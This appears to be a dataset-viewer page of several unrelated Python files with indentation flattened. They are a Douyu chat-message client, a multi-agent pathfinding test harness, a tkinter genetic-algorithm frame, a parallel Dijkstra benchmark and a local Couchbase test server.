'@=ggbb': self._convert_ggbb
}
@staticmethod
def transform_msg(content):
# 发送消息前转换消息为目标结构
length = bytearray([len(content) + 9, 0x00, 0x00, 0x00])
code = length
magic = bytearray([0xb1, 0x02, 0x00, 0x00])
end = bytearray([0x00])
trscont = bytes(content.encode('utf-8'))
return bytes(length + code + magic + trscont + end)
def connect_to_server(self):
# 链接到弹幕服务器
try:
self.socket.connect((self.HOST, self.PORT))
except socket.error as e:
print(str(e))
else:
self.is_connected = True
print('connected to danmu server')
def print_danmu(self):
# 打印弹幕信息
msgs = self.send_and_get_msg()
for msg in msgs:
self._convert_danmu(msg)
def publish_danmu(self):
# 将弹幕消息转发到redis channel中广播
danmu_channel = 'channel:{}'.format(self.room_id)
msgs = self.send_and_get_msg()
for msg in msgs:
danmu_info = dumps(self._convert_danmu(msg))
if danmu_info:
r.publish(danmu_channel, danmu_info)
def terminate(self):
# 终止弹幕获取
self.is_terminated = True
def send_and_get_msg(self):
# 接受弹幕消息
if self.is_connected:
# 发送登陆信息并加入指定弹幕频道
self.socket.sendall(self.transform_msg(self.LOGIN_INFO))
self.socket.sendall(self.transform_msg(self.JION_GROUP))
keep_aliver = self._keep_connect_alive()
next(keep_aliver)
loop_begin = datetime.now()
while not self.is_terminated:
now = time()
sleep(0.1)
# 更新keepalive
running_time = datetime.now()
if (running_time - loop_begin).seconds > 40:
keep_alive_info = self.KEEP_ALIVE.format(now)
keep_alive_info = self.transform_msg(keep_alive_info)
self.is_terminated = keep_aliver.send(keep_alive_info)
loop_begin = datetime.now()
try:
danmu_msg = self.socket.recv(1000)
except socket.error as e:
print(str(e))
else:
yield danmu_msg
def _keep_connect_alive(self):
# 保活socket链接
while self.is_connected:
keep_alive_info = yield False
if keep_alive_info:
try:
self.socket.sendall(keep_alive_info)
except socket.error as e:
print('error in keepalive:' + str(e))
print('*' * 10 + 'keepalive' + '*' * 10)
sleep(1)
def _convert_danmu(self, danmu_msg):
# 根据消息类型,将消息解析转发到对应方法
for flag in self.msg_types:
if flag in danmu_msg:
return self.convert_function_map.get(flag)(danmu_msg)
def _convert_chatmsg(self, chat_msg):
# 转换普通聊天信息
chat_dict = dict()
user_name = re.search("\/nn@=(.+?)\/", chat_msg)
if user_name:
chat_dict.setdefault('username', user_name.group(1))
chat_content = re.search("\/txt@=(.+?)\/", chat_msg)
if chat_content:
chat_dict.setdefault('chatcontent', chat_content.group(1))
user_level = re.search("\/level@=(.+?)\/", chat_msg)
if user_level:
chat_dict.setdefault('userlevel', user_level.group(1))
chat_date = datetime.now()
chat_dict.setdefault('date', chat_date.isoformat(' '))
for k, v in chat_dict.items():
print('{} >>> {}:{}'.format(self.room_id, k, v))
return chat_dict
def _convert_onlinegift(self, onlinegift):
# 转换在线礼物信息
onlinegift_dict = dict()
username = re.search("\/nn@=(.+?)\/", onlinegift)
if username:
onlinegift_dict.setdefault('username', username.group(1))
sil = re.search("\/sil@=(.+?)\/", onlinegift)
if sil:
onlinegift_dict.setdefault('sil', sil.group(1))
print('{} >>user:{} 获得鱼丸{}个'.format(self.room_id, username, sil))
return onlinegift_dict
def _convert_dgb(self, dgb):
# 转换赠送礼物信息
dgb_dict = dict()
username = re.search("\/nn@=(.+?)\/", dgb)
if username:
dgb_dict.setdefault('username', username.group(1))
hits = re.search("\/hits@=(.+?)\/", dgb)
if hits:
dgb_dict.setdefault('hits', hits.group(1))
gift_type = re.search("\/gs@=(.+?)\/", dgb)
if gift_type:
dgb_dict.setdefault('gift_type', gift_type.group(1))
print('{} >>> {}送出{}{}连击'.format(self.room_id, dgb_dict.get('username', None),
dgb_dict.get('gift_type', None),
dgb_dict.get('hits', None)))
return dgb_dict
def _convert_uenter(self, uenter):
# 转换用户进入直播间信息
uenter_dict = dict()
username = re.search("\/nn@=(.+?)\/", uenter)
if username:
uenter_dict.setdefault('username', username.group(1))
print('{} >>>欢迎:{} 进入直播间'.format(self.room_id, uenter_dict.setdefault('username', None)))
return uenter_dict
def _convert_bc_buy_deserve(self, bc_buy_deserve):
# 转换酬勤赠送信息
return None
def _convert_ssd(self, ssd):
# 转换超级弹幕信息
return None
def _convert_spbc(self, spbc):
# 转换房间内赠送礼物信息
spbc_dict = dict()
sender_name = re.search("\/sn@=(.+?)\/", spbc)
if sender_name:
spbc_dict.setdefault('sender_name', sender_name.group(1))
reciver_name = re.search("\/dn@=(.+?)\/", spbc)
if reciver_name:
spbc_dict.setdefault('reciver_name', reciver_name.group(1))
gift_num = re.search("\/gc@=(.+?)\/", spbc)
if gift_num:
spbc_dict.setdefault('gift_num', gift_num.group(1))
gift_name = re.search("\/gn@=(.+?)\/", spbc)
if gift_name:
spbc_dict.setdefault('gift_name', gift_name.group(1))
print('{} >>> {}赠送给{} {}个{}'.format(self.room_id, spbc_dict.get('sender_name', None),
spbc_dict.get('reciver_name', None),
spbc_dict.get('gift_num', None),
spbc_dict.get('gift_name', None)))
return spbc_dict
def _convert_ggbb(self, ggbb):
# 转换房间用户抢红包信息
ggbb_dict = dict()
username = re.search("\/dnk@=(.+?)\/", ggbb)
if username:
ggbb_dict.setdefault('username', username.group(1))
sender_name = re.search("\/snk@=(.+?)\/", ggbb)
if sender_name:
ggbb_dict.setdefault('sender_name', sender_name.group(1))
gift_num = re.search("\/sl@=(.+?)\/", ggbb)
if gift_num:
ggbb_dict.setdefault('gift_num', gift_num.group(1))
gift_type = re.search("\/rpt@=(.+?)\/", ggbb)
if gift_type:
ggbb_dict.setdefault('gift_type', gift_type.group(1))
print('{} >>> {} 获得了来自{}的{}个{}'.format(self.room_id, ggbb_dict.get('username', None),
ggbb_dict.get('sender_name', None),
ggbb_dict.get('gift_num', None),
ggbb_dict.get('gift_type', None)))
return ggbb_dict
if __name__ == '__main__':
rooms = ['67373', '71017']
danmu_client = []
for room in rooms:
danmu = DouyuDM(room)
danmu_client.append(danmu)
danmu.connect_to_server()
danmu_thread = Thread(target=danmu.print_danmu)
danmu_thread.start()
|
testing.py
|
import math
import multiprocessing
import os
import time
from src.a_star import A_star
from src.cbs import CBS
from src.cbs_ds import CBS_DS
from src.cbs_h import CBS_H
from src.cbs_pc import CBS_PC
from src.map import Map
from test.movingai import read_map_from_moving_ai_file, read_tasks_from_moving_ai_file
from os import path
from random import sample, seed
from src.visualization import draw
def A_star_test(path):
i_start = 1
j_start = 1
i_goal = 13
j_goal = 28
width, height, cell = read_map_from_moving_ai_file(path)
task_map = Map()
task_map.set_grid_cells(width, height, cell)
print(A_star(task_map, i_start, j_start, i_goal, j_goal, []))
print(A_star(task_map, i_start, j_start, i_goal, j_goal, [((2, 1), 1)]))
print(A_star(task_map, i_start, j_start, i_goal, j_goal, [((1, 1), 0)]))
def CBS_test(task_map, agents, status, target_class=CBS):
cbs = target_class(task_map, agents)
sol, cost, nodes_cnt = cbs.find_best_solutions()
print(f"{target_class.__name__}: cost = {str(cost)}, nodes = {str(nodes_cnt)}")
# draw(task_map, sol, agents)
if cost < math.inf:
status.append(cost)
status.append(nodes_cnt)
status.append("Found!")
else:
status.append("Not found!")
def big_test(scenario_path,
min_agents,
max_agents,
step=5,
sample_times=20,
experiment_time=6000*5,
target_class=CBS):
seed(1337)
agents, map_file = read_tasks_from_moving_ai_file(scenario_path)
width, height, cell = read_map_from_moving_ai_file(path.join(os.path.dirname(os.path.dirname(__file__)), 'data', 'maps', map_file))
task_map = Map()
task_map.set_grid_cells(width, height, cell)
manager = multiprocessing.Manager()
cur_time = time.time()
successes_ratios = []
nodes = []
times = []
for agents_n in range(min_agents, max_agents + 1, step):
successes = 0
nodes += [[]]
times += [[]]
for i in range(sample_times):
start_time = time.time()
print(f"Starting experiment number {i + 1} / {sample_times} on {agents_n} agents")
cur_agents = sample(agents, k=agents_n)
res = manager.list()
p = multiprocessing.Process(target=CBS_test, args=(task_map, cur_agents, res, target_class))
p.start()
p.join(experiment_time)
if p.is_alive():
print("Time limit exceeded, finishing")
p.terminate()
if len(res) == 3 and res[2] == 'Found!':
successes += 1
nodes[-1] += [res[1]]
times[-1] += [time.time() - start_time]
successes_ratios += [successes / sample_times]
print(f'{successes} out of {sample_times} successes on {agents_n} agents')
spended_time = time.time() - cur_time
print(f'Time spent: {spended_time}')
return successes_ratios, spended_time, nodes, times
# big_test('../data/scenarios/den520d/den520d-even-1.scen', 6, 6, sample_times=1)
# big_test('../data/scenarios/empty_8_8/empty-8-8-even-25.scen', 5, 5, 1, 1)
# big_test('../data/scenarios/towards.scen', 2, 2, 1, 1, target_function=CBS_PC_test)
# big_test('../data/scenarios/mice.scen', 2, 2, 1, 1, target_function=CBS_PC_test)
# big_test('../data/scenarios/empty_8_8/empty-8-8-even-25.scen', 10, 10, 1, 1)
# big_test('../data/scenarios/empty_8_8/empty-8-8-even-25.scen', 10, 10, 1, 1, target_class=CBS_PC)
# big_test('../data/scenarios/empty_8_8/empty-8-8-even-25.scen', 10, 10, 1, 1, target_class=CBS_DS)
# big_test('../data/scenarios/empty_8_8/empty-8-8-even-25.scen', 10, 10, 1, 1, target_class=CBS_H)
# big_test('../data/scenarios/den520d/den520d-even-1.scen', 6, 6, sample_times=1, target_class=CBS_PC)
# big_test('../data/scenarios/den520d/den520d-even-1.scen', 10, 10, sample_times=1, target_class=CBS_DS)
# big_test('../data/scenarios/den520d/den520d-even-1.scen', 6, 6, step=1, sample_times=1, target_class=CBS_H, experiment_time=300)
# big_test('../data/scenarios/ost003d/ost003d-even-25.scen', 5, 10, step=1, sample_times=2, target_class=CBS_H, experiment_time=300)
|
MainFrame.py
|
"""
This class contains all functions to manage different windows
Base line for this code is from Sentdex(link under)
https://pythonprogramming.net/object-oriented-programming-crash-course-tkinter/
"""
import random as r
from itertools import cycle
import tkinter as tk
import EvolutionManager
import Population
import multiprocessing as mp
import time
import threading as t
import RandomMapGenerator as rmg
import CanvasFrame
import sys
import StartFrame
#-------------------------------------------------------------------------------------
class MainFrame(tk.Tk):
""" This is main class for managing different views(windows) """
def onClossing(self):
self.manager.stopMainLoop()
self.destroy()
sys.exit()
#-------------------------------------------------------------------------------------
def setEvent(self,event):
self.event = event
#-------------------------------------------------------------------------------------
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
# init main frame
self.container = tk.Frame(self)
self.container.pack(side="top", fill="both", expand = True)
# self.container.grid(row = 0, column = 0, sticky = "nswe")
self.frames = {}
# init frame add to dict
frame = CanvasFrame.CanvasFrame(self.container, self)
self.frames[CanvasFrame] = frame
frame.grid(row = 0, column = 0, sticky = "nswe")
# init frame add to dict
frame = StartFrame.StartFrame(self.container, self)
self.frames[StartFrame] = frame
frame.grid(row = 0, column = 0, sticky = "nswe")
# add close window event handler
self.protocol("WM_DELETE_WINDOW", self.onClossing)
# load canvas
self.show_frame(CanvasFrame)
#-------------------------------------------------------------------------------------
def show_frame(self, cont):
""" makes choosen frame visibale at top"""
# get window
frame = self.frames[cont]
self.topFrame = frame
# make window in front
# .lift() should also works
# self.attributes("-topmost", True)
frame.tkraise()
# set gird position
print("Show Frame")
#-------------------------------------------------------------------------------------
def getCurrentTopFrame(self):
""" returns top frame object"""
return self.topFrame
#-------------------------------------------------------------------------------------
def setForClossingEvent(self, manager):
""" sets thread variable for future stoping when app is being closed"""
self.manager = manager
#------------------------------------------------------------------------------------- \
def genethicAlgorithmPart(self):
"""begin training sequence"""
self.manager.startTraining()
#-------------------------------------------------------------------------------------
def addChangerListiner(self):
""" makes a new thread in widget process to monitor changes to be displayed"""
thread = t.Thread(target = self.changeListiner)
thread.start()
#-------------------------------------------------------------------------------------
def changeListiner(self):
""" contains logic for cheking for changes and updatting them"""
lastBest = None
best = None
print("Starting listiner thread")
while True:
#wait for info about event
self.event.wait()
#get new possible best one and old one store for future comparing
lastBest, best = best,self.manager.population.bestSalesman
if lastBest is not best:
# if new one is really better then update the drawing on canvas
self.getCurrentTopFrame().updateFrame(best.dna.getAsListOfTuple())
# clear event so it could be set again
self.event.clear()
#-------------------------------------------------------------------------------------
|
dijk_range_mp.py
|
import random
import time
import sys
import multiprocessing
from multiprocessing import Lock,Process,Semaphore,Barrier,Array,Queue
INT_MAX = multiprocessing.Value('i',1000000000)
#N=multiprocessing.Value('i',16384)
#DEG=multiprocessing.Value('i',16)
#P=multiprocessing.Value('i',1)
q = multiprocessing.Queue()
N1=int(sys.argv[2])
DEG1=int(sys.argv[3])
P1=int(sys.argv[1])
W = [[0 for x in range(DEG1)] for x in range(N1)]
W_index = [[0 for x in range(DEG1)] for x in range(N1)]
u = multiprocessing.Array('i',range(P1))
D = multiprocessing.Array('i',range(N1))
Q = multiprocessing.Array('i',range(N1))
range_1 = multiprocessing.Array('i',range(P1))
terminate = multiprocessing.Array('i',range(P1))
lock = multiprocessing.Lock()
l = [multiprocessing.Lock() for i in range(0,N1)]
INT_MAX1=1000000000
barrier = Barrier(P1)
local_min = multiprocessing.Array('i',range(P1))
def graph():
global W
global W_index
global P
global INT_MAX
global D
global Q
global u
global local_min
global l
for i in range(0,N1):
for j in range(0,DEG1):
W_index[i][j] = i+j
W[i][j] = i+j#random.randint(1,3)+i
if W_index[i][j] >= N1-1 :
W_index[i][j] = N1-1
#W[i][j] = N-1 random.randint(1, 10) + i
if i==i+j:
W[i][j]=0
#print (W[i][j], W_index[i][j])
#print (' ')
def array_init():
for i in range(0,N1):
D[i] = INT_MAX1
Q[i] = 1
D[0] = 0
def do_work(tid,D,Q,N,DEG,P,u, l,lock, terminate,range_1):
start_time = time.time()
local_count=N.value
N=N.value
DEG=DEG.value
P=P.value
INT_MAX2=INT_MAX.value
u[tid]=0
uu=0
i_start = tid*DEG/P
i_stop = (tid+1)*DEG/P
barrier.wait()
while terminate[0]==0: #outer loop
while u[0]<range_1[0]:
for i in range(0,DEG):
l[W_index[uu][i]].acquire()
if(D[W_index[uu][i]] > D[uu] + W[uu][i]):
D[W_index[uu][i]] = D[uu] + W[uu][i] #relax
l[W_index[uu][i]].release()
lock.acquire()
if u[0]<range_1[0]:
u[0] = u[0] + 1
uu = u[0]
if u[0] >= N-1:
terminate[0] = 1
lock.release()
if tid==0:
range_1[0] = range_1[0]*DEG
if range_1[0] >= N:
range_1[0] = N
barrier.wait()
final_time = time.time() - start_time
print ('TID:',tid,'TIME_SEC',final_time)
strr0 = "range/range"
strr1 = str(P)
strr11 = str(N)
strr12 = str(DEG)
strr2 = ".out"
strr3 = "-"
strr_final = strr0 + strr3 + strr1 + strr3 + strr11 + strr3 + strr12 + strr2
f = open(strr_final,'w')
f.write(str(final_time))
f.close
#if tid==0:
# for i in range(0,N):
# print (D[i],Q[i])
def main():
graph()
array_init()
P11 = int(sys.argv[1])
N11 = int(sys.argv[2])
DEG11 = int(sys.argv[3])
print(P11)
P1 = P11
N1 = N11
DEG1 = DEG11
P = multiprocessing.Value('i',P11)
N = multiprocessing.Value('i',N11)
DEG = multiprocessing.Value('i',DEG11)
range_1[0] = 1
terminate[0] = 0
for i in range(1,P1):
p = Process(target=do_work,args=(i,D,Q,N,DEG,P,u, l,lock, terminate,range_1))
p.start()
do_work(0,D,Q,N,DEG,P,u, l,lock, terminate,range_1)
for i in range(1,P1):
p.join()
if __name__ == "__main__":
main()
|
sdkserver.py
|
import eventlet
import json
import random
import string
import json
import sys
import time
from couchbase.couchbaseclient import CouchbaseClient
from multiprocessing import Process
import testcfg as cfg
pool = eventlet.GreenPool(1000000)
processMap = {}
class SysCouchClient(CouchbaseClient):
def __init__(self, url, bucket, cred, accport):
self.pending_get_msgs = 0
self.bucket = bucket
self.url = url
self.cred = cred
self.ready = True
self.accport = accport
try:
super(SysCouchClient, self).__init__(url, bucket, cred)
print "sdk_%s: connected to %s => %s" % (accport, url, bucket)
except Exception as ex:
print "sdk_%s: unable to establish connection to %s => %s, %s " %\
(accport, url, bucket, ex)
self.ready = False
def incr_pending_get_msgs(self, val):
self.pending_get_msgs = \
self.pending_get_msgs + val
class CouchClientManager():
def __init__(self, accport):
self.client_map = {}
self.accport = accport
def add_bucket_client(self, bucket = "default",
password = "",
ip = cfg.COUCHBASE_IP,
port = cfg.COUCHBASE_PORT):
url = "http://%s:%s/pools/default" % (ip, port)
client = SysCouchClient(url, bucket, password, self.accport)
if client.ready == True:
self.client_map[bucket] = client
def get_bucket_client(self, bucket,
password = "",
ip = cfg.COUCHBASE_IP,
port = cfg.COUCHBASE_PORT):
if bucket not in self.client_map:
self.add_bucket_client(bucket, password, ip, port)
return self.client_map[bucket]
def requestHandler(self, client_sock):
c = ''
respond = False
while True:
_recv = client_sock.recv(1024)
if not _recv:
break
if _recv == '\0':
respond = True
break
else:
c = c + _recv
rc = self._requestHandler(c)
if respond:
self.sendClientResponse(client_sock, rc)
client_sock.close()
def sendClientResponse(self, client_sock, rc):
msg = ""
if rc is not None:
try:
msg = json.dumps(rc)
except Exception:
pass
client_sock.send(msg)
def _requestHandler(self, c, retries = 0):
try:
data = json.loads(c)
self.client_from_req(data)
res = self.exec_request(data)
return res
except ValueError as ex:
print ex
print "unable to decode json: %s" % c
except Exception as ex:
processMap[self.accport]["connected"] = False
print "Error: %s" % ex
def exec_request(self, data):
if data['command'] == 'set':
return self.do_set(data)
if data['command'] == 'setq':
return self.do_setq(data)
if data['command'] == 'mset':
return self.do_mset(data)
if data['command'] == 'mdelete':
return self.do_mdelete(data)
if data['command'] == 'get':
return self.do_get(data)
if data['command'] == 'mget':
return self.do_mget(data)
if data['command'] == 'delete':
return self.do_delete(data)
if data['command'] == 'query':
return self.do_query(data)
if data['command'] == 'latency':
return self.get_op_latency(data)
def do_mset(self, data):
keys = data['args']
template = data['template']
kv = template['kv']
ttl = 0
flags = 0
if "ttl" in template:
ttl = int(template['ttl'])
if "flags" in template:
flags = template['flags']
client = self.client_from_req(data)
for key in keys:
doc = {"args" : [key, ttl, flags, kv]}
try:
self.do_setq(doc, client)
except Exception as ex:
raise Exception(ex)
rc = client.recv_bulk_responses()
if len(rc) > 0:
for msg in rc:
if isinstance(msg, dict) and 'error' in msg and int(msg["error"]) != 0:
if int(msg["error"]) == 7:
client.reconfig_vbucket_map(forward=True)
if int(msg["error"]) == 134:
pass # temp failure (oom) ignore
else:
ts = time.localtime()
ts_string = "%s/%s/%s %s:%s:%s" %\
(ts.tm_year, ts.tm_mon, ts.tm_mday, ts.tm_hour, ts.tm_min, ts.tm_sec)
print "%s:set MemcachedError%d: %s" % (ts_string, msg["error"], msg["rv"])
return True
def _get_set_args(self, data):
key = str(data['args'][0])
exp = int(data['args'][1])
flags = int(data['args'][2])
value = json.dumps(data['args'][3])
return key, exp, flags, value
def do_setq(self, args, client):
key, exp, flags, value = self._get_set_args(args)
client.setq(key,exp, flags, value)
return True
def get_op_latency(self, data):
# retrieve instance of sdk client
client = self.client_from_req(data)
# op_args pass in as tuple, i.e
# set => ('key', 0, 0, 'val')
op_args = data['args']
# select op
op = data['op']
if op == 'set':
op_args[3] = json.dumps(op_args[3])
func = client.set
if op == 'get':
func = client.get
if op == 'delete':
func = client.delete
# timed wrapper
start = time.time()
rc = func(*op_args) # exec
end = time.time()
latency = end - start
return latency
def do_set(self, data):
key, exp, flags, value = self._get_set_args(data)
client = self.client_from_req(data)
return client.set(key,exp, flags, value)
def do_get(self, data):
key = str(data['args'][0])
client = self.client_from_req(data)
client.get(key)
return key
def do_mget(self, data):
keys = data['args']
client = self.client_from_req(data)
for key in keys:
key = str(key)
client.getq(key)
# increment getq count
client.incr_pending_get_msgs(len(keys))
if client.pending_get_msgs > 400:
rc = client.recv_bulk_responses()
if len(rc) > 0:
for msg in rc:
if isinstance(msg, dict) and 'error' in msg and int(msg["error"]) != 0:
if int(msg["error"]) == 7:
client.reconfig_vbucket_map(forward=True)
if int(msg["error"]) == 134:
pass # temp failure (oom) ignore
else:
ts = time.localtime()
ts_string = "%s/%s/%s %s:%s:%s" %\
(ts.tm_year, ts.tm_mon, ts.tm_mday, ts.tm_hour, ts.tm_min, ts.tm_sec)
print "%s:get MemcachedError%d: %s" % (ts_string, msg["error"], msg["rv"])
client.pending_get_msgs = 0
else:
client.noop()
return True
def do_delete(self, data):
key = str(data['args'][0])
client = self.client_from_req(data)
res = client.delete(key)
return res
def do_mdelete(self, data):
keys = data['args']
results = []
client = self.client_from_req(data)
for key in keys:
key = str(key)
client.deleteq(key)
return True
def client_from_req(self, data, password = ""):
bucket = str(data["bucket"])
if "password" in data:
password = str(data["password"])
ip = data['cb_ip']
port = data['cb_port']
client = self.get_bucket_client(bucket, password, ip, port)
return client
def monitorSubprocesses():
# when any subprocess ends, attempt to restart
while True:
for port in processMap:
if not processMap[port]['process'].is_alive():
restart_listener(port)
time.sleep(1)
def restart_listener(port):
stop_listener(port)
start_listener(port)
def stop_listener(port):
process = processMap[port]["process"]
try:
print "sdk_%s: exiting" % (port)
process.terminate()
except Exception as ex:
print "sdk_%s: error occured termination %s" % (port, ex)
def start_listener(port):
p = Process(target=_run, args=(port,))
processMap[port] = {"process" : p,
"connected" : True,
"alt_nodes" : []}
print "sdk_%s: starting" % port
p.start()
def _run(port):
server = eventlet.listen(('127.0.0.1', port))
client_mgr = CouchClientManager(port)
while processMap[port]["connected"]:
new_sock, address = server.accept()
pool.spawn_n(client_mgr.requestHandler, new_sock)
if __name__ == '__main__':
for port in xrange(50008, 50012):
start_listener(port)
monitorSubprocesses()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.